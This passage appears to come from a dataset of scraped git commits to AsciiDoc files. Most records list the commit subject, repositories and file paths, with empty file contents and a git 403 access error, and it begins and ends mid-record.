asticsearch,JervyShi\/elasticsearch,pritishppai\/elasticsearch,jeteve\/elasticsearch,Stacey-Gammon\/elasticsearch,MichaelLiZhou\/elasticsearch,shreejay\/elasticsearch,nrkkalyan\/elasticsearch,MetSystem\/elasticsearch,Widen\/elasticsearch,18098924759\/elasticsearch,tahaemin\/elasticsearch,bestwpw\/elasticsearch,Helen-Zhao\/elasticsearch,kevinkluge\/elasticsearch,wbowling\/elasticsearch,wayeast\/elasticsearch,petabytedata\/elasticsearch,wimvds\/elasticsearch,pablocastro\/elasticsearch,clintongormley\/elasticsearch,obourgain\/elasticsearch,kubum\/elasticsearch,slavau\/elasticsearch,xingguang2013\/elasticsearch,ESamir\/elasticsearch,brandonkearby\/elasticsearch,kimimj\/elasticsearch,likaiwalkman\/elasticsearch,lmtwga\/elasticsearch,wangtuo\/elasticsearch,dpursehouse\/elasticsearch,JackyMai\/elasticsearch,tsohil\/elasticsearch,Uiho\/elasticsearch,coding0011\/elasticsearch,wenpos\/elasticsearch,a2lin\/elasticsearch,Stacey-Gammon\/elasticsearch,gmarz\/elasticsearch,MetSystem\/elasticsearch,iacdingping\/elasticsearch,HarishAtGitHub\/elasticsearch,lzo\/elasticsearch-1,fforbeck\/elasticsearch,glefloch\/elasticsearch,mortonsykes\/elasticsearch,nrkkalyan\/elasticsearch,mikemccand\/elasticsearch,nazarewk\/elasticsearch,mbrukman\/elasticsearch,MjAbuz\/elasticsearch,naveenhooda2000\/elasticsearch,andrestc\/elasticsearch,Ansh90\/elasticsearch,kalburgimanjunath\/elasticsearch,alexshadow007\/elasticsearch,cwurm\/elasticsearch,i-am-Nathan\/elasticsearch,himanshuag\/elasticsearch,xpandan\/elasticsearch,kalimatas\/elasticsearch,Shepard1212\/elasticsearch,njlawton\/elasticsearch,tebriel\/elasticsearch,s1monw\/elasticsearch,mmaracic\/elasticsearch,IanvsPoplicola\/elasticsearch,karthikjaps\/elasticsearch,palecur\/elasticsearch,btiernay\/elasticsearch,mbrukman\/elasticsearch,acchen97\/elasticsearch,dylan8902\/elasticsearch,szroland\/elasticsearch,mm0\/elasticsearch,18098924759\/elasticsearch,fernandozhu\/elasticsearch,infusionsoft\/elasticsearch,tkssharma\/elasticsearch,himanshuag\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,strapdata\/elassandra-test,yongminxia\/elasticsearch,andrejserafim\/elasticsearch,StefanGor\/elasticsearch,szroland\/elasticsearch,diendt\/elasticsearch,hydro2k\/elasticsearch,linglaiyao1314\/elasticsearch,qwerty4030\/elasticsearch,hafkensite\/elasticsearch,kingaj\/elasticsearch,PhaedrusTheGreek\/elasticsearch,nomoa\/elasticsearch,dylan8902\/elasticsearch,EasonYi\/elasticsearch,sc0ttkclark\/elasticsearch,JSCooke\/elasticsearch,myelin\/elasticsearch,jango2015\/elasticsearch,Ansh90\/elasticsearch,snikch\/elasticsearch,zkidkid\/elasticsearch,fforbeck\/elasticsearch,huanzhong\/elasticsearch,njlawton\/elasticsearch,ulkas\/elasticsearch,avikurapati\/elasticsearch,umeshdangat\/elasticsearch,markllama\/elasticsearch,iamjakob\/elasticsearch,markwalkom\/elasticsearch,knight1128\/elasticsearch,robin13\/elasticsearch,sdauletau\/elasticsearch,ckclark\/elasticsearch,achow\/elasticsearch,obourgain\/elasticsearch,camilojd\/elasticsearch,schonfeld\/elasticsearch,acchen97\/elasticsearch,ZTE-PaaS\/elasticsearch,fekaputra\/elasticsearch,LewayneNaidoo\/elasticsearch,sposam\/elasticsearch,Shekharrajak\/elasticsearch,episerver\/elasticsearch,F0lha\/elasticsearch,JervyShi\/elasticsearch,tahaemin\/elasticsearch,SergVro\/elasticsearch,kunallimaye\/elasticsearch,lks21c\/elasticsearch,apepper\/elasticsearch,MaineC\/elasticsearch,Kakakakakku\/elasticsearch,jchampion\/elasticsearch,tkssharma\/elasticsearch,rento19962\/elasticsearch,jimhooker2002\/elasticsearch,shreejay\/elasticsearch,franklanganke\/elasticsearch,vroyer\/elasticassandra,hanswang\/elasticsearch,kubum\/elasticsearch,umeshdangat\/elasticsearch,elancom\/elasticsearch,diendt\/elasticsearch,iacdingping\/elasticsearch,elancom\/elasticsearch,gfyoung\/elasticsearch,dataduke\/elasticsearch,cwurm\/elasticsearch,ricardocerq\/elasticsearch,lightslife\/elasticsearch,sc0ttkclark\/elasticsearch,dataduke\/elasticsearch,Shekharrajak\/elasticsearch,davidvgalbraith\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,xpandan\/elasticsearch,s1monw\/elasticsearch,dpursehouse\/elasticsearch,tsohil\/elasticsearch,hanswang\/elasticsearch,Kakakakakku\/elasticsearch,martinstuga\/elasticsearch,djschny\/elasticsearch,lydonchandra\/elasticsearch,javachengwc\/elasticsearch,polyfractal\/elasticsearch,karthikjaps\/elasticsearch,rhoml\/elasticsearch,mjhennig\/elasticsearch,mgalushka\/elasticsearch,drewr\/elasticsearch,fernandozhu\/elasticsearch,lightslife\/elasticsearch,GlenRSmith\/elasticsearch,caengcjd\/elasticsearch,lchennup\/elasticsearch,sdauletau\/elasticsearch,strapdata\/elassandra5-rc,MisterAndersen\/elasticsearch,wittyameta\/elasticsearch,dataduke\/elasticsearch,himanshuag\/elasticsearch,mm0\/elasticsearch,nilabhsagar\/elasticsearch,18098924759\/elasticsearch,wangtuo\/elasticsearch,tebriel\/elasticsearch,springning\/elasticsearch,rhoml\/elasticsearch,shreejay\/elasticsearch,nellicus\/elasticsearch,socialrank\/elasticsearch,pablocastro\/elasticsearch,dpursehouse\/elasticsearch,henakamaMSFT\/elasticsearch,kingaj\/elasticsearch,karthikjaps\/elasticsearch,franklanganke\/elasticsearch,coding0011\/elasticsearch,pritishppai\/elasticsearch,Kakakakakku\/elasticsearch,sdauletau\/elasticsearch,franklanganke\/elasticsearch,hanswang\/elasticsearch,Shekharrajak\/elasticsearch,fforbeck\/elasticsearch,rhoml\/elasticsearch,vietlq\/elasticsearch,fernandozhu\/elasticsearch,amit-shar\/elasticsearch,Ansh90\/elasticsearch,elancom\/elasticsearch,nomoa\/elasticsearch,djschny\/elasticsearch,MichaelLiZhou\/elasticsearch,scorpionvicky\/elasticsearch,kunallimaye\/elasticsearch,bestwpw\/elasticsearch,Brijeshrpatel9\/elasticsearch,uschindler\/elasticsearch,ulkas\/elasticsearch,amit-shar\/elasticsearch,gmarz\/elasticsearch,KimTaehee\/elasticsearch,hafkensite\/elasticsearch,Liziyao\/elasticsearch,javachengwc\/elasticsearch,javachengwc\/elasticsearch,pablocastro\/elasticsearch,kcompher\/elasticsearch,mm0\/elasticsearch,henakamaMSFT\/elasticsearch,myelin\/elasticsearch,rento19962\/elasticsearch,andrejserafim\/elasticsearch,petabytedata\/elasticsearch,camilojd\/elasticsearch,trangvh\/elasticsearch,davidvgalbraith\/elasticsearch,Brijeshrpatel9\/elasticsearch,rhoml\/elasticsearch,KimTaehee\/elasticsearch,nrkkalyan\/elasticsearch,smflorentino\/elasticsearch,MaineC\/elasticsearch,kenshin233\/elasticsearch,episerver\/elasticsearch,Liziyao\/elasticsearch,gingerwizard\/elasticsearch,Fsero\/elasticsearch,avikurapati\/elasticsearch,geidies\/elasticsearch,rhoml\/elasticsearch,Widen\/elasticsearch,ouyangkongtong\/elasticsearch,mm0\/elasticsearch,lightslife\/elasticsearch,C-Bish\/elasticsearch,jango2015\/elasticsearch,mgalushka\/elasticsearch,AndreKR\/elasticsearch,lchennup\/elasticsearch,Rygbee\/elasticsearch,truemped\/elasticsearch,slavau\/elasticsearch,LeoYao\/elasticsearch,winstonewert\/elasticsearch,btiernay\/elasticsearch,nomoa\/elasticsearch,rmuir\/elasticsearch,fooljohnny\/elasticsearch,alexshadow007\/elasticsearch,ESamir\/elasticsearch,tsohil\/elasticsearch,liweinan0423\/elasticsearch,Shekharrajak\/elasticsearch,zeroctu\/elasticsearch,jprante\/elasticsearch,abibell\/elasticsearch,JSCooke\/elasticsearch,ulkas\/elasticsearch,nrkkalyan\/elasticsearch,jbertouch\/elasticsearch,mcku\/elasticsearch,Chhunlong\/elasticsearch,mortonsykes\/elasticsearch,iacdingping\/elasticsearch,kaneshin\/elasticsearch,18098924759\/elasticsearch,areek\/elasticsearch,mnylen\/elasticsearch,alexshadow007\/elasticsearch,infusionsoft\/elasticsearch,camilojd\/elasticsearch,lks21c\/elasticsearch,kunallimaye\/elasticsearch,xuzha\/elasticsearch,ckclark\/elasticsearch,areek\/elasticsearch,gingerwizard\/elasticsearch,szroland\/elasticsearch,xuzha\/elasticsearch,MichaelLiZhou\/elasticsearch,JervyShi\/elasticsearch,EasonYi\/elasticsearch,achow\/elasticsearch,sreeramjayan\/elasticsearch,ImpressTV\/elasticsearch,drewr\/elasticsearch,wittyameta\/elasticsearch,njlawton\/elasticsearch,smflorentino\/elasticsearch,jchampion\/elasticsearch,btiernay\/elasticsearch,fernandozhu\/elasticsearch,andrestc\/elasticsearch,Charlesdong\/elasticsearch,obourgain\/elasticsearch,fooljohnny\/elasticsearch,beiske\/elasticsearch,strapdata\/elassandra,polyfractal\/elasticsearch,shreejay\/elasticsearch,Liziyao\/elasticsearch,ydsakyclguozi\/elasticsearch,queirozfcom\/elasticsearch,coding0011\/elasticsearch,springning\/elasticsearch,alexshadow007\/elasticsearch,achow\/elasticsearch,fooljohnny\/elasticsearch,snikch\/elasticsearch,yuy168\/elasticsearch,iantruslove\/elasticsearch,karthikjaps\/elasticsearch,Ansh90\/elasticsearch,mbrukman\/elasticsearch,fernandozhu\/elasticsearch,gingerwizard\/elasticsearch,tkssharma\/elasticsearch,Shepard1212\/elasticsearch,nazarewk\/elasticsearch,qwerty4030\/elasticsearch,wimvds\/elasticsearch,linglaiyao1314\/elasticsearch,Ansh90\/elasticsearch,palecur\/elasticsearch,polyfractal\/elasticsearch,vingupta3\/elasticsearch,umeshdangat\/elasticsearch,kaneshin\/elasticsearch,ivansun1010\/elasticsearch,jbertouch\/elasticsearch,kalburgimanjunath\/elasticsearch,F0lha\/elasticsearch,Charlesdong\/elasticsearch,HonzaKral\/elasticsearch,a2lin\/elasticsearch,fred84\/elasticsearch,wenpos\/elasticsearch,palecur\/elasticsearch,mjason3\/elasticsearch,lydonchandra\/elasticsearch,sc0ttkclark\/elasticsearch,huanzhong\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,AndreKR\/elasticsearch,PhaedrusTheGreek\/elasticsearch,kaneshin\/elasticsearch,kingaj\/elasticsearch,tahaemin\/elasticsearch,ydsakyclguozi\/elasticsearch,dylan8902\/elasticsearch,andrejserafim\/elasticsearch,vingupta3\/elasticsearch,wbowling\/elasticsearch,wuranbo\/elasticsearch,nrkkalyan\/elasticsearch,strapdata\/elassandra5-rc,jimhooker2002\/elasticsearch,glefloch\/elasticsearch,trangvh\/elasticsearch,winstonewert\/elasticsearch,i-am-Nathan\/elasticsearch,SergVro\/elasticsearch,markllama\/elasticsearch,iantruslove\/elasticsearch,mgalushka\/elasticsearch,qwerty4030\/elasticsearch,jprante\/elasticsearch,girirajsharma\/elasticsearch,nezirus\/elasticsearch,jpountz\/elasticsearch,vroyer\/elassandra,dylan8902\/elasticsearch,vingupta3\/elasticsearch,sarwarbhuiyan\/elasticsearch,mgalushka\/elasticsearch,pranavraman\/elasticsearch,ivansun1010\/elasticsearch,NBSW\/elasticsearch,Charlesdong\/elasticsearch,areek\/elasticsearch,geidies\/elasticsearch,jchampion\/elasticsearch,jchampion\/elasticsearch,zeroctu\/elasticsearch,winstonewert\/elasticsearch,adrianbk\/elasticsearch,linglaiyao1314\/elasticsearch,vietlq\/elasticsearch,huanzhong\/elasticsearch,fekaputra\/elasticsearch,amit-shar\/elasticsearch,cnfire\/elasticsearch-1,masterweb121\/elasticsearch,acchen97\/elasticsearch,lchennup\/elasticsearch,slavau\/elasticsearch,ImpressTV\/elasticsearch,mnylen\/elasticsearch,strapdata\/elassandra5-rc,fekaputra\/elasticsearch,Brijeshrpatel9\/elasticsearch,Liziyao\/elasticsearch,drewr\/elasticsearch,ckclark\/elasticsearch,rhoml\/elasticsearch,ouyangkongtong\/elasticsearch,sdauletau\/elasticsearch,mapr\/elasticsearch,Shekharrajak\/elasticsearch,apepper\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,pozhidaevak\/elasticsearch,jeteve\/elasticsearch,Liziyao\/elasticsearch,gmarz\/elasticsearch,wittyameta\/elasticsearch,mnylen\/elasticsearch,mikemccand\/elasticsearch,jbertouch\/elasticsearch","old_file":"docs\/reference\/aggregations\/bucket\/histogram-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/histogram-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5fd341285c617150222b8b66a643bb56a0e0f929","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"747a216b88fbda4795ca805ea1a94c26d6597464","subject":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-23-3UniqueGadgetsYouWouldntExpectToExist.adoc","new_file":"_posts\/2018-02-23-3UniqueGadgetsYouWouldntExpectToExist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7eb5907b27450d8bf11c173a60b71ee4e35afe8a","subject":"Some typos in JSON RPC API protocol","message":"Some typos in JSON RPC API protocol\n\nFix it and reformat large examples.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac89db30f7f0406d0b24d1a64e34c9012814b1d5","subject":"Create terminology_zh.adoc","message":"Create terminology_zh.adoc","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/terminology_zh.adoc","new_file":"src\/docs\/asciidoc\/jme3\/terminology_zh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"776ef91b70d814433653ed363bb0c03ea5dabab6","subject":"Update 2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","message":"Update 2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","new_file":"_posts\/2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"140568dda3ee757ab925ad6db9e532ce8d76b479","subject":"Update 2016-02-23-Clojure-X-2015.adoc","message":"Update 2016-02-23-Clojure-X-2015.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2016-02-23-Clojure-X-2015.adoc","new_file":"_posts\/2016-02-23-Clojure-X-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2df3ec04976e6a89d5532ba294a2cecc30d34cc","subject":"Update 2018-05-14-command64.adoc","message":"Update 2018-05-14-command64.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-14-command64.adoc","new_file":"_posts\/2018-05-14-command64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03de710c1e5d1dcf89f1001d8ec458a1c8cc3b87","subject":"Update 2018-07-11-big-thing.adoc","message":"Update 2018-07-11-big-thing.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-07-11-big-thing.adoc","new_file":"_posts\/2018-07-11-big-thing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1350b05280e07b9a9a90c90843b85b2b5bf29d9a","subject":"Update 2018-08-30-Exception.adoc","message":"Update 2018-08-30-Exception.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-Exception.adoc","new_file":"_posts\/2018-08-30-Exception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f6062b824aa001493d8d2671d0c6448addb917c","subject":"Update 2017-03-14-First-Post.adoc","message":"Update 2017-03-14-First-Post.adoc","repos":"kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io","old_file":"_posts\/2017-03-14-First-Post.adoc","new_file":"_posts\/2017-03-14-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kzmenet\/kzmenet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2ac8f38850d07c167cd2dc276d674e65f054c5e","subject":"\u0423\u0441\u043b\u043e\u0432\u0438\u0435 \u043d\u0430 \u0443\u043f\u0440\u0430\u0436\u043d\u0435\u043d\u0438\u0435 7 \u041d\u0438\u0448\u043a\u0438 \u0438 \u043c\u043d\u043e\u0433\u043e\u043d\u0438\u0448\u043a\u043e\u0432\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0438\u0440\u0430\u043d\u0435","message":"\u0423\u0441\u043b\u043e\u0432\u0438\u0435 \u043d\u0430 \u0443\u043f\u0440\u0430\u0436\u043d\u0435\u043d\u0438\u0435 7 \u041d\u0438\u0448\u043a\u0438 \u0438 \u043c\u043d\u043e\u0433\u043e\u043d\u0438\u0448\u043a\u043e\u0432\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0438\u0440\u0430\u043d\u0435\n","repos":"slbedu\/javase8-2016","old_file":"lab07\/README.adoc","new_file":"lab07\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/slbedu\/javase8-2016.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e7b0aa2e162b3909ee973ced6f9d6f19d076d8f","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dad423c467ee75ea2e99d0707564fc37c66e84ac","subject":"Python notes: Calling method or function by name","message":"Python notes: Calling method or function by name\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"35d5fa8c1acbc8a8c53a014fb45ec6f939e140b6","subject":"Python note: Enum good practice","message":"Python note: Enum good practice\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d6f1855728871cc2671e3cbd03f2cbaedbc8c13a","subject":"[doc] Rewrite usage","message":"[doc] Rewrite usage\n","repos":"jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb10b6dad745fcfb72de7a2bc99a0f34e7878197","subject":"added readme","message":"added readme\n","repos":"hivemq\/deny-wildcard-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hivemq\/deny-wildcard-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1051ad555ac9ac98a41aa0efa675ce4a1d009e1c","subject":"Update README","message":"Update README\n","repos":"pjanouch\/liberty,pjanouch\/liberty","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/liberty.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"86a9a428788df1b08dc1651068d9d80fd99640d6","subject":"Add README","message":"Add README\n","repos":"mlocati\/ServicesControl","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/ServicesControl.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33460b44257c5a37d42d90ef0c6214e3038f470f","subject":"Fixed README","message":"Fixed README\n","repos":"pschalk\/camunda-bpm-custom-batch","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pschalk\/camunda-bpm-custom-batch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce0cad30833e072c43641b42b040176f3fd4abf6","subject":"Publish 2016-7-2-thinphp.adoc","message":"Publish 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-thinphp.adoc","new_file":"2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aaeb2be68861b89bd942de6d76cb232120052f55","subject":"Create common-createGithubRepositoryForCI.adoc","message":"Create common-createGithubRepositoryForCI.adoc","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-createGithubRepositoryForCI.adoc","new_file":"src\/main\/docs\/common-createGithubRepositoryForCI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"022074d9154c3097aa5364acdf86e17c53b80a26","subject":"New readme.adoc for draft-docs","message":"New readme.adoc for draft-docs\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"draft-docs\/readme.adoc","new_file":"draft-docs\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a44df052b142f60d022a07cebcf788994dfa38a3","subject":"Promotion for spotify plugin ;)","message":"Promotion for spotify plugin ;)\n","repos":"bms-devs\/jdd-2015-logging-in-microservices,bms-devs\/jdd-2015-logging-in-microservices,bms-devs\/wjug-2016-logging-in-microservices,uguy\/Elasticsearch-Logstash-Kibana,uguy\/elk","old_file":"Readme.adoc","new_file":"Readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bms-devs\/jdd-2015-logging-in-microservices.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c71e1e31531fd697ffec28bc2617a909befb0082","subject":"Update 2017-08-19.adoc","message":"Update 2017-08-19.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-08-19.adoc","new_file":"_posts\/2017-08-19.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80397e654494a6e5a7c0b5c54ed5e480719ffebb","subject":"Update 2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","message":"Update 2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebbb0c9b4c9a6770fea314bb8f91bbfc78a45835","subject":"Update 2018-05-02-create-Google-Document-From-Spreadsheet.adoc","message":"Update 2018-05-02-create-Google-Document-From-Spreadsheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-create-Google-Document-From-Spreadsheet.adoc","new_file":"_posts\/2018-05-02-create-Google-Document-From-Spreadsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73bfbed41e4d4afc0c5b5338e0b44fe9ba1fddcc","subject":"added readme","message":"added readme\n","repos":"sothawo\/mapjfx,sothawo\/mapjfx,sothawo\/mapjfx","old_file":"Downloads\/readme.adoc","new_file":"Downloads\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sothawo\/mapjfx.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"028c0e8d7d06c419b040830de1f5c311bcc38a5d","subject":"y2b create post Zelda Skyward Sword Limited Edition Unboxing","message":"y2b create post Zelda Skyward Sword Limited Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-22-Zelda-Skyward-Sword-Limited-Edition-Unboxing.adoc","new_file":"_posts\/2011-11-22-Zelda-Skyward-Sword-Limited-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dce0b12b8ed92453b780036e00366f884111ce50","subject":"created file, added initial content","message":"created file, added initial 